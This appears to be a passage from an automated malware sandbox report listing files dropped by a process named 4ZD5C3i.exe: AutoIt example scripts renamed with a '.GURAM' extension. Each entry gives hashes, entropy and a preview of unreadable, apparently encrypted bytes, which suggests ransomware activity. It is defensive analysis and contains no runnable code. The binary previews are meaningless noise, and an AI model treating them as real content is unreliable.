                                                                                                                                                                                                                                                Preview:A..6X}cYa.0\..r...nkP.......ma..6U...*r.."g~'...J..f...3.q.l..$..!0.q......Uj..[.Nd....q.tW..s.5R.(.Z.h................yg.m.L.<G.9..m.B...0...n..v..Q...K........M..<X...O...B-...91O...w........W.9......*ZU....]=.k...,d..h\..J.....T..1....]!.j.s..%Q)k.....O....l~.OLzI...r.%..r..h...XW.....E.".HV'...X.........b.2'u.0m}G.....>0.i..-.>....=..=GsL.}<..\...{..g.v.Tq.cs..~..B.A.%.^..f<qp...;..P}.....|.y..l...kkd....,.8.....Y.5..%.|.,.G....E.)....t..v^V.t.s<m.s..i....=T..1.?wd#.).....LN.....}.O..F. ..ov.....7...y....^..=..Pk?..P.Q..y .U....=H[.ZsT..N........y........./yZ.A.]+....X....n...........vN.e!f....N....k.Qu.J%...u..)46c...6...l.}).A....4....3.'.....;..s^...F..O..h+,..\..F.....:[.>..Q.%k..U.|..............t...<.Mku.uW..g..m,Xw.}...N........5a.|....U.;D..._.....Z..C...._g...W.o....Fn$#jU.9..EL~..@&........... S....6.K.F-aY.I.wp6..2-$.....;....n..nM..R...4....T....%.B.#_...................fk.W...f

                                                                                                                                                                                                                                                C:\Program Files (x86)\autoit3\Examples\Helpfile\WinWaitClose.au3.{BB5EFC24-51A9-DB6D-27DC-3EA48BD33F86}.GURAM (copy)

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):805
                                                                                                                                                                                                                                                Entropy (8bit):7.7205880828007265
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:12:LulbWNpnv7PCX/iIyjaGJYIsS+WwgHIc0jmksXU4HrkW6tDJum1qDkXvsO1xXZk+:albWTnvDqi1jmJrc0YXUZtwsTus
                                                                                                                                                                                                                                                MD5:36F959620665ED2F002E602E87BDB554
                                                                                                                                                                                                                                                SHA1:FDC769BB81CFFC5F93F41F7BB1148D07D620D114
                                                                                                                                                                                                                                                SHA-256:D169FB8A685E924A5D608B17DAF5A36F646A6E73316A66822B4D7B752CC8CD2C
                                                                                                                                                                                                                                                SHA-512:87BAF2794A611D979E6765B5DA44C3533609C9CF5B67665F8F797F2E99F0601A6E3A0082CB3EF97AB8FB8E60F7F26DCAA6CF0527E16D5A1462083B7FA26775F5
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:]...8....xpv.!.5...p*...FH..A.........,.*.....M.z...N..J.K.M....Qa+.sr......J......:.z..8I.Sg..}1..|.&Q;<....Q.._I...+..7.:.A.Q.....?Zy....}..!..L.....t...8.w.V%.....,....D.'......-.>....=..=GsL.}<..\...{..g.v.Tq.cs..~..B.A.%.^..f<qp...;..P}.....|.y..l...kkd....,.8.....Y.5..%.|.,.G....E.)....t..v^V.t.s<m.s..i....=T..1.?wd#.).....LN.....}.O..F. ..ov.....7...y....^..=..Pk?..P.Q..y .U....=H[.ZsT..N........y........./yZ.A.]+....X....n...........vN.e!f....N....k.Qu.J%...u..)46c...6...l.}).A....4....3.'.....;..s^...F..O..h+,..\..F.....:[.>..Q.%k..U.|..............t...<.Mku.uW..g..m,Xw.}...N........5a.|....U.;D..._.....Z..C...._g...W.o....Fn$#jU.9..EL~..@&........... S....6.K.F-aY.I.wp6..2-$.....-.s.Lqes.7...@J-3s...Z...CSQ.@(....................fk.W...f

                                                                                                                                                                                                                                                C:\Program Files (x86)\autoit3\Examples\Helpfile\WinWaitNotActive.au3.{BB5EFC24-51A9-DB6D-27DC-3EA48BD33F86}.GURAM (copy)

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):821
                                                                                                                                                                                                                                                Entropy (8bit):7.721524685435987
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:12:mx4eblwMq6fDQ2YjntfjaGJYIsS+WwgHIc0jmksXU4HrkW6tDJum1qDkXvsO1xXC:mSeblwnAU2YTljmJrc0YXUZtwsT3Pi7
                                                                                                                                                                                                                                                MD5:1000C8C0AB31D5294A5A75857378871A
                                                                                                                                                                                                                                                SHA1:2DAA7CA7FF7DE4D4BD29DDD43946DB73C0BB7B69
                                                                                                                                                                                                                                                SHA-256:EDC58C18015F48FB42CEB28F7D38894E5E9040ECF63D20E4B786EB26AD709360
                                                                                                                                                                                                                                                SHA-512:9FCBA36B1436DA4F8D81ED477922776E4899E5B92A958787AD7CCBBFB25EB1D722C72D02C306BF09F465E3BB64F85C398B5928B6C7838E0912AD9DC4EBADF83B
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:\.o~!.MhLvH.B:c.L.j7...%Q.:.D.ctP..k...f.,3.A..{.K......Gd.~/ ........el.jG..QU6.$...3..):.o.R../I..=JO../E]......e.G".1..X`.j.....J.._ M@....,.z..D*.P...8r.#,/....L.E\....Q]..6......k...D.b.W..w.i..kPH&..>....=..=GsL.}<..\...{..g.v.Tq.cs..~..B.A.%.^..f<qp...;..P}.....|.y..l...kkd....,.8.....Y.5..%.|.,.G....E.)....t..v^V.t.s<m.s..i....=T..1.?wd#.).....LN.....}.O..F. ..ov.....7...y....^..=..Pk?..P.Q..y .U....=H[.ZsT..N........y........./yZ.A.]+....X....n...........vN.e!f....N....k.Qu.J%...u..)46c...6...l.}).A....4....3.'.....;..s^...F..O..h+,..\..F.....:[.>..Q.%k..U.|..............t...<.Mku.uW..g..m,Xw.}...N........5a.|....U.;D..._.....Z..C...._g...W.o....Fn$#jU.9..EL~..@&........... S....6.K.F-aY.I.wp6..2-$..7.Y`kcH..uS.#..y.(....>.^..D..5........................fk.W...f

                                                                                                                                                                                                                                                C:\Program Files (x86)\autoit3\Examples\Helpfile\With.au3.{BB5EFC24-51A9-DB6D-27DC-3EA48BD33F86}.GURAM (copy)

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):802
                                                                                                                                                                                                                                                Entropy (8bit):7.693762487470381
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:12:SUFqXTklptFgj2GgjaGJYIsS+WwgHIc0jmksXU4HrkW6tDJum1qDkXvsO1xXZUva:SUYjkljFgjhgjmJrc0YXUZtwsT4va
                                                                                                                                                                                                                                                MD5:783D14CB16B83A2E7AE4A01EFB8F1142
                                                                                                                                                                                                                                                SHA1:72F61D1550AB2FEA299EF1CF577339CE417119E8
                                                                                                                                                                                                                                                SHA-256:E29536C12F08BA33DA0FD50CFC8AB016998BBF6A72BC9EB8396C0DF9045C3978
                                                                                                                                                                                                                                                SHA-512:E535FEA7E05C4E3048CB50A3B44C10E77659A4E0459EF398CC59350C3D220A08E15CE9C0B71CE509EB189A0C451D210A12D0B33E6F4403894BD9E637C4A45FF0
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:.6..`.d.Y.4...ea...VJ.b.<.|Gv.s._.%]Km....f......T(.%....&sf.'.)t..f-.x..0....*......+tp!...Z}.5W..ZD.....D.t8~j.D..Z..N#....k...|.....J...T...yX........&..y..%e.U..@.B.;.q.ro.S...P..>....=..=GsL.}<..\...{..g.v.Tq.cs..~..B.A.%.^..f<qp...;..P}.....|.y..l...kkd....,.8.....Y.5..%.|.,.G....E.)....t..v^V.t.s<m.s..i....=T..1.?wd#.).....LN.....}.O..F. ..ov.....7...y....^..=..Pk?..P.Q..y .U....=H[.ZsT..N........y........./yZ.A.]+....X....n...........vN.e!f....N....k.Qu.J%...u..)46c...6...l.}).A....4....3.'.....;..s^...F..O..h+,..\..F.....:[.>..Q.%k..U.|..............t...<.Mku.uW..g..m,Xw.}...N........5a.|....U.;D..._.....Z..C...._g...W.o....Fn$#jU.9..EL~..@&........... S....6.K.F-aY.I.wp6..2-$.L...4U...@..4.J......j.0P..VJ......................fk.W...f

                                                                                                                                                                                                                                                C:\Program Files (x86)\autoit3\Examples\Helpfile\_Array1DToHistogram.au3.{BB5EFC24-51A9-DB6D-27DC-3EA48BD33F86}.GURAM (copy)

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):797
                                                                                                                                                                                                                                                Entropy (8bit):7.7091618505410064
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:12:cmgvh2Chhczxry+zL+jaGJYIsS+WwgHIc0jmksXU4HrkW6tDJum1qDkXvsO1xXZI:cf52Chhczxry6+jmJrc0YXUZtwsTc
                                                                                                                                                                                                                                                MD5:CE18B743FE42A1EB91588C2F613791BB
                                                                                                                                                                                                                                                SHA1:4D6E1A2F2FA01E01719CABE1E437F80995714614
                                                                                                                                                                                                                                                SHA-256:BC487DB318E0524FBFA92DD4856060F9B40429AAD67FFE047E48D8BBE46F4386
                                                                                                                                                                                                                                                SHA-512:E45279F3123D8DA95A643BBFFE470EB6F7015C1D7CD9DB0071BF29354378C14B79DCB35C41292CEECA0D904A1C5DC61D95C43BF4FF62C10263E6B94A20EA4033
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:U....m.... ....y.&...."i-.\.w..@....B.............OcZK...n.jc0b..............Yh..'.A...U!._y..f..~._..bb...z.j.-.c....u.\..i.T..0F.8...8\.YWI....[B.3.8]..3.#.Xwy.....6G..;.........8.>....=..=GsL.}<..\...{..g.v.Tq.cs..~..B.A.%.^..f<qp...;..P}.....|.y..l...kkd....,.8.....Y.5..%.|.,.G....E.)....t..v^V.t.s<m.s..i....=T..1.?wd#.).....LN.....}.O..F. ..ov.....7...y....^..=..Pk?..P.Q..y .U....=H[.ZsT..N........y........./yZ.A.]+....X....n...........vN.e!f....N....k.Qu.J%...u..)46c...6...l.}).A....4....3.'.....;..s^...F..O..h+,..\..F.....:[.>..Q.%k..U.|..............t...<.Mku.uW..g..m,Xw.}...N........5a.|....U.;D..._.....Z..C...._g...W.o....Fn$#jU.9..EL~..@&........... S....6.K.F-aY.I.wp6..2-$.`W...f...Ry.g7.x.-.,...."&W!..Y."D.....................fk.W...f

                                                                                                                                                                                                                                                C:\Program Files (x86)\autoit3\Examples\Helpfile\_Array1DToHistogram[2].au3.{BB5EFC24-51A9-DB6D-27DC-3EA48BD33F86}.GURAM (copy)

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):900
                                                                                                                                                                                                                                                Entropy (8bit):7.761841902968861
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:24:/jEJhWM6yv1VKNj5c92jmJrc0YXUZtwsTvBL4:/Uht6q1g9gI4o0jZtw+L4
                                                                                                                                                                                                                                                MD5:446E56B79A23B7F02769D9C1696AE604
                                                                                                                                                                                                                                                SHA1:1B76748B9C5B963954354AA4F6DD78B70A881375
                                                                                                                                                                                                                                                SHA-256:81AB6859FD09E0A179B1E82C63CF9D2E7948655BCECB4FFDB40B8866F6ACCE2C
                                                                                                                                                                                                                                                SHA-512:9439C7B285CF10A046BEA78CAF3FD6F778BF6E2238292D3A1CB4CA0274D750D36E72A6857A1BE8D8CCF4638CAB2907CDCF11A08683D43BE7225C37B82985F482
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:..b6........Q.q......|.!......12...-....-..D>.N.b...A.....7:aS.nt.RHsX..V...V3...9.8'#..,,.U..2.YU@2F.3<....pM.,k/..G.uh.F..d..R.R...?...%...,..w..c...HW(...I.<_......<.b....>NGj...5.E.{.X......J.)".^z.H..dB..Z..{..(.......>.....P..CGO..R..(..1Xl....w..O....rMtk2}...V...V..]O|.>....=..=GsL.}<..\...{..g.v.Tq.cs..~..B.A.%.^..f<qp...;..P}.....|.y..l...kkd....,.8.....Y.5..%.|.,.G....E.)....t..v^V.t.s<m.s..i....=T..1.?wd#.).....LN.....}.O..F. ..ov.....7...y....^..=..Pk?..P.Q..y .U....=H[.ZsT..N........y........./yZ.A.]+....X....n...........vN.e!f....N....k.Qu.J%...u..)46c...6...l.}).A....4....3.'.....;..s^...F..O..h+,..\..F.....:[.>..Q.%k..U.|..............t...<.Mku.uW..g..m,Xw.}...N........5a.|....U.;D..._.....Z..C...._g...W.o....Fn$#jU.9..EL~..@&........... S....6.K.F-aY.I.wp6..2-$.5....R..4..n.g....o..J....f.B...8d.$...................fk.W...f

                                                                                                                                                                                                                                                C:\Program Files (x86)\autoit3\Examples\Helpfile\_Array2DCreate.au3.{BB5EFC24-51A9-DB6D-27DC-3EA48BD33F86}.GURAM (copy)

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):796
                                                                                                                                                                                                                                                Entropy (8bit):7.712724133668209
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:12:ml8PMC8cWgjaGJYIsS+WwgHIc0jmksXU4HrkW6tDJum1qDkXvsO1xXZc3+LpOfHn:mSYLgjmJrc0YXUZtwsTnLpO/
                                                                                                                                                                                                                                                MD5:291D120CCB580AA56527F851F0DD56FC
                                                                                                                                                                                                                                                SHA1:0DC28B18A1A7DE717B66565442D1AD4194C0BEE0
                                                                                                                                                                                                                                                SHA-256:9123FC0932B3684A10C0B738BABDBD5448B3956295B0811AD776C53E8809ADEC
                                                                                                                                                                                                                                                SHA-512:3696D87B772C7E9F6FC35F1E8A139CDFD7547FE39EE0AE0D72C769741D6E3E322639A91C5F539479CB80B3851DDD118E75191DBD0A7F51464896244E04E54754
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:..86...,6wO...d.....i.....x.KO#e.o<..u..V{.?X.[....f..l..)u.RxG..\.&6va.}.....@..]$s.2.Yu..$...Z?..;.Q<..J.q..t.6.....c.`.F..`......b..S}..Q1...@.h..%....%...... .X7.26.G7...>....=..=GsL.}<..\...{..g.v.Tq.cs..~..B.A.%.^..f<qp...;..P}.....|.y..l...kkd....,.8.....Y.5..%.|.,.G....E.)....t..v^V.t.s<m.s..i....=T..1.?wd#.).....LN.....}.O..F. ..ov.....7...y....^..=..Pk?..P.Q..y .U....=H[.ZsT..N........y........./yZ.A.]+....X....n...........vN.e!f....N....k.Qu.J%...u..)46c...6...l.}).A....4....3.'.....;..s^...F..O..h+,..\..F.....:[.>..Q.%k..U.|..............t...<.Mku.uW..g..m,Xw.}...N........5a.|....U.;D..._.....Z..C...._g...W.o....Fn$#jU.9..EL~..@&........... S....6.K.F-aY.I.wp6..2-$.....k.I...1..R.....+.K......?z.l=.-.....................fk.W...f

                                                                                                                                                                                                                                                C:\Program Files (x86)\autoit3\Examples\Helpfile\_Array2DCreate[2].au3.{BB5EFC24-51A9-DB6D-27DC-3EA48BD33F86}.GURAM (copy)

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):1984
                                                                                                                                                                                                                                                Entropy (8bit):7.891584662621897
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:48:mP/s2AtxGanSn+4x1GSp95vQ/F9+1bQ0O4o0jZtwom:4TAzhIxB9pQT+Hleom
                                                                                                                                                                                                                                                MD5:D074859D2A8A95DA9554F68555D7593B
                                                                                                                                                                                                                                                SHA1:C574276FA2360F8CA24E3BA1AD0A6A7090CA7ACF
                                                                                                                                                                                                                                                SHA-256:4209BE2CF35F4E756C445D968DE48EDED7B25D785A92862DC251A0F66A628FF1
                                                                                                                                                                                                                                                SHA-512:3DEE9FC95FD94E28CF26913F11CF17A0773096ADB5F3134E36EC1E55200D54B7B3F5D2ABE4578B6AAE2BFC90B5AA690E128E63D3D2D0675737216BACAEB7EB9D
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:.~%.9.e3..v..u..2.c.um}C.1E...(....i.D....lQ}..be...."^..r-..$....t..b......b>..J...!..#.wQ....X.2q.Mm.0......&........X..,.L....X...~H..w..S9v...o..s\.G<.$...!_...7c..K *..mt....7r...4:........#.....n.on!>..{..HV.kM......]..".8W..~..z..xK.)W.4....xhg.0....(Z.>14..........ia<.... .._.g...:.. ...0e...P.2._..|..k.........;,.....hv..;ky...|p%.O.m?.R3&C)...&...K.n`..K.u.<....]./.......F.u3.=.P._\........T.[.u3`.L..N..C.).].s.jF...Yu.M...-..C.5..,...Q.hm.{...B.RF.9..RU?X8m.Q.....PQ...m.`7..C#+f..8.>J........_.....2.}..Dbq.7U.C..+...5.......z.....<.p.6..,.%..a..g...UV........R..+...L.{jy."q,.......q...E...".....2".Y......{.N..6.Pfk%(.kk......<.l.wie-j.<J......d..((....G........!...Q.%.?f..:pN.bR............$%....C......Ow&3..%..__..."\.7..{D..J7..G..;.'.............$....D.76=.!.$HW.VQ..jRn.....Rw.+..q.d.u.....M.,.{...z.3.qW.M..mk#.y~..E....pI...v$./R.......N..............2..M...=)...;.^B>......d.|8..l ..!.$.d......qm/.$......1....R

                                                                                                                                                                                                                                                C:\Program Files (x86)\autoit3\Examples\Helpfile\_ArrayAdd.au3.{BB5EFC24-51A9-DB6D-27DC-3EA48BD33F86}.GURAM (copy)

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):1519
                                                                                                                                                                                                                                                Entropy (8bit):7.8707819819361475
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:24:I3KKA+fii3HB9GlWrR8s6Pj1xediLatF4XlyNVokzpy1LU3tZVxejmJrc0YXUZtZ:I3M+HGAbU1tatFOkVokzpco3tZXQ4o0t
                                                                                                                                                                                                                                                MD5:ACC281CEE1EB3E3B32D93743DFCD0E4D
                                                                                                                                                                                                                                                SHA1:82C16AA3055DB5F33FEAD0A13EFCA08F6BAE18DE
                                                                                                                                                                                                                                                SHA-256:CB883342780876EB6B73B43B04BE81465387CFF0A294505847C98473ABB68689
                                                                                                                                                                                                                                                SHA-512:CA5B43A3D827E604CF8C6BFA094A229FE75CDFE7D4C1A0845CB14E527C70D3052F689F03216305BE01F87D264C2E5DDFF888D1FDAFEBCFA2A8BA76D9AEC851C6
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:...(..\oc...).(I.6...E..x.`.~..../..(.G.Y.O1..../cE..i2....~-.e2.w.gi8.'...6.j.....,.q2..!..@d.G[l..W.K...J...X.\).`.G...vY...=JQ^.rmL.MT7.8...n.+W.*U..lZ..`....E..z^.W..p....M1.....|....%f@r<.J....1.o....|.bJ.K../.wW.u..Z......g.F...`[1yN.......G.BF. #..9z...P..S^H"%..5f..u...q.......rW/.RD%H.....7<.<v.ifc.SP...i#.....%uF..u#.....).b.rY.....o.w-..yCj..[0.%.%d....^.*..04.bd...)-<c!T4. z..%..2..g..\:...;Q....L5........$5..UsR../..IL|........G.....VD(.....P,.q_..j...!.......q....v.../.p.....I.1.....s).9.....m0K..\..wu.....y.....#.Sn..^M.!2..<m.F.v_.0.y...GJ'.;.!h.c.X.)G.W.9..ow........X&...#.\....Y.<.f-..o'..x......Dy[....Y..y*~..<MB.z....$...`...$.......w#...../..MR...PY.R..bo3.v-....a.q./. lD..:..c...L.Z.&...t+]..cF..5h\6.]Q..U0.:N.7.Y.Kd...2.-.t...\..8M.3.V...B[.zJ3B.[....3utT.)e.].(I>.NA.3.%..dP.8.I.MI...2.W#.xK..L...e.e....."..P./.i..C....P.Z..>....=..=GsL.}<..\...{..g.v.Tq.cs..~..B.A.%.^..f<qp...;..P}.....|.y..l...kkd....,.

                                                                                                                                                                                                                                                C:\Program Files (x86)\autoit3\Examples\Helpfile\_ArrayAdd[2].au3.{BB5EFC24-51A9-DB6D-27DC-3EA48BD33F86}.GURAM (copy)

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):1821
                                                                                                                                                                                                                                                Entropy (8bit):7.8941546900419945
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:48:atfEmaH9zIp+MxyeBY5D3eruH3dL4Tg6+lH4o0jZtwoPs:GKzIpbPG3PLct+6leo0
                                                                                                                                                                                                                                                MD5:D83E5953A5F948FF971BE4E871B958FC
                                                                                                                                                                                                                                                SHA1:EDF00539B6355C53C5EC9802C2898215FAE07329
                                                                                                                                                                                                                                                SHA-256:37105AF20675CA937F1A579C77047AACE0CC2000CC987B6EAEA2974ED3914B84
                                                                                                                                                                                                                                                SHA-512:9A4F6E70FEBF325ADDA50E82EEF4FC17DC55E0C53F8AE7712B5248DE278A029BDC408D55B29FF4B0D046D1115E38852B5F9DD9CD70ED79A0C120991376F4FABD
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:.^.Z..X.w.c.....<...{;...#w 3U.....-G..9..5Q+3B>.DI }...|..G.4#.oZx`.T_.)....^o@....../.....al.....u.a..V....u../..1...W.._{...DFH..w.jr.TSD./.....<5...."_.Az.....D......l..>...E{...+85\.vv{p...[.._..Vj....}..'.Y.|..<Y...@x...|..u..{....n;#...)..ig.ry?v.g(..."e.+.....v_..lnFdI.Uj...~.z....f......5.}1...`R25A2...MK.R..7Jh...rNZ..s.Yf.:.?.N.GLU.a.$..6....2Gg.J`.>.....K......yV4qm.@..,..c..e|...E.0..H..m.{+.h....M!..?./.6N.^'z.Y..I..j..k]+!"x..`.a...7E..........r...d......C......3;x...._......e*F.P....$).l..k..G.Hq...#.....r.../.f.o...uU...?.........A.o|..j.....8u.x..E..@5....u.....&..<3c...'..e..y......`.R....u.?.....`.H..._[..W@.%.8bf.a..b....|P."..V..N.I..\*.8.......b|..h............|G...o.m%.<.H...J..FB....@yMYy..:..'.~.....Bj.6j...!...c...z....)\)....{.......)X....~5s..v....A.h.,.[.:.a/..R...I..Y..a......s._Y...p..N...x.....u...+.........C4*>.7.,B1.8.,...b.~).....|n.....<.B....L..7Wfh."^..u..xs.M..v{8.ol*/...eQ..

                                                                                                                                                                                                                                                C:\Program Files (x86)\autoit3\Examples\Helpfile\_ArrayAdd[3].au3.{BB5EFC24-51A9-DB6D-27DC-3EA48BD33F86}.GURAM (copy)

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):1618
                                                                                                                                                                                                                                                Entropy (8bit):7.8558606601258285
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:24:3kVxQnrrF4JoWSG51Cy3oKmkjq1PGt8KbXjwgjmJrc0YXUZtwsTWLu1:UVmnfkF7ocqlmpbXjwu4o0jZtwzL2
                                                                                                                                                                                                                                                MD5:54748003F22FBD0A1B0B0616EF7BF18A
                                                                                                                                                                                                                                                SHA1:E89D9CD0A4355A3986845BDD76F99EF4C72E4A12
                                                                                                                                                                                                                                                SHA-256:0E5D1B1ABBF3EB55742DD912A50B47CF7B335A189600E827D64F3A403A397C5A
                                                                                                                                                                                                                                                SHA-512:C292E36D3B49E5CB988D710B0B09E0E576145571A824244D212D4E3ADF6F3187EEB9325685D312BF4355C13985BC2B0AEE70A83A51DB1BF5C4C771D0B2C9AE0D
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:...i/.@)a1).N..)Y..U..r.6_s&V.l2..W..)...Z&j...68....W.}...)N...|*.\....I..b....(..>m.@...c....y...+..~Z[..]....=.s.D.*.. ...y......G-f.G8.4`9=e..T;.'-R...A.."T.t.V+.Su..r.)6..z...C{f.O.gJ..q..-U8..........W_..(R....!.....GE|/........@..>..i....0..o...Oh..`D../.X7h...L..GAL.C.k...........F.z.Z.k...e.n.{..}Yk*E...Zo.u...T...k6z.1YF(.8....3s.P..or."....N...D...^...v....>....|)^..d.dSP...c&Lc..c.B.......*.yI1....X../.9.C..05.w.L..}..'U.P.B..J.4..../.....W.....+j....N..c8...%..{S.....0....!.r..RW...].Q....q.f$r....'.s......u.clL..Lv.D.,.P32S..d}.;m..CGQ.5)V.....g..I.a.........\E.p.l0.b..9.x).;2.............o[..[...yk^,3.:U.9~.n;.....I..<.....e....8%)G Z~.0pk.=.!..X`.Hx..9....;N,q>...u!p.(...wDa9U..@.<t0........A..C{....H..nNINl...Vh...v....h6V.I3E...........!.9......%.^j........Y..[._X../.....e.x...q.(qUUF*....@..Z...5....-...=W..MzO........99.Z.l."j`u.j..uc..;.D.4..-.s..'@.FB...Md.....\1.I...~..5..,.........TN.UN..=..Pa%.u........,<.].61.........

                                                                                                                                                                                                                                                C:\Program Files (x86)\autoit3\Examples\Helpfile\_ArrayBinarySearch.au3.{BB5EFC24-51A9-DB6D-27DC-3EA48BD33F86}.GURAM (copy)

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):1050
                                                                                                                                                                                                                                                Entropy (8bit):7.796600532964034
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:24:+AlzSpTaj2ig7vDZacjmJrc0YXUZtwsTQgap:FlepL7vD0i4o0jZtwiap
                                                                                                                                                                                                                                                MD5:B3550AA9E93AE42DD1CA342C7D883C0B
                                                                                                                                                                                                                                                SHA1:493D91E11F7DF2F6E7B580742D218BB740F6868C
                                                                                                                                                                                                                                                SHA-256:3341C8EBB94FD7E5616B2A967EB482CEA55519E34DFE1CB26BBEE4AB50F3D3AD
                                                                                                                                                                                                                                                SHA-512:8273AB1204A3B78D533808DA33FEE840F7689FB3D00C394F7C12F92CF27E08AEA468A6C8AA91D04941A017A459730DCF84C751B02A5F46394A355F8F850FBFEA
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:...7.!.M.D..."'.R.(<.:..G..ya..y......fW.{.$*....L...;.YEv.9!...?.....+.k.....B..a.../emE.m.8..vz..=.VlO2...l.....fm.Z....l.@I....U;..7..|.Nlvr.<.c......Wp#.C.D.c....0.Q...i/......U...`....:K....Y.4..g.G[V...3yz..".2B....B.h.....k..6....7...5../..L...S@.........m.,....V..&.....I.....0*b..7....f..{.,..S.4.5.o....D..W.0....-w..G.s"....Ri.)mI..AU..@B.D...L|.K....C.t.|.{...1..=..........NiHm....r.]..! Qf$.N..b.X.K..\-..>....=..=GsL.}<..\...{..g.v.Tq.cs..~..B.A.%.^..f<qp...;..P}.....|.y..l...kkd....,.8.....Y.5..%.|.,.G....E.)....t..v^V.t.s<m.s..i....=T..1.?wd#.).....LN.....}.O..F. ..ov.....7...y....^..=..Pk?..P.Q..y .U....=H[.ZsT..N........y........./yZ.A.]+....X....n...........vN.e!f....N....k.Qu.J%...u..)46c...6...l.}).A....4....3.'.....;..s^...F..O..h+,..\..F.....:[.>..Q.%k..U.|..............t...<.Mku.uW..g..m,Xw.}...N........5a.|....U.;D..._.....Z..C...._g...W.o....Fn$#jU.9..EL~..@&........... S....6.K.F-aY.I.wp6..2-$...S.....P.E0.4

                                                                                                                                                                                                                                                C:\Program Files (x86)\autoit3\Examples\Helpfile\_ArrayBinarySearch[2].au3.{BB5EFC24-51A9-DB6D-27DC-3EA48BD33F86}.GURAM (copy)

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):1232
                                                                                                                                                                                                                                                Entropy (8bit):7.81538598360145
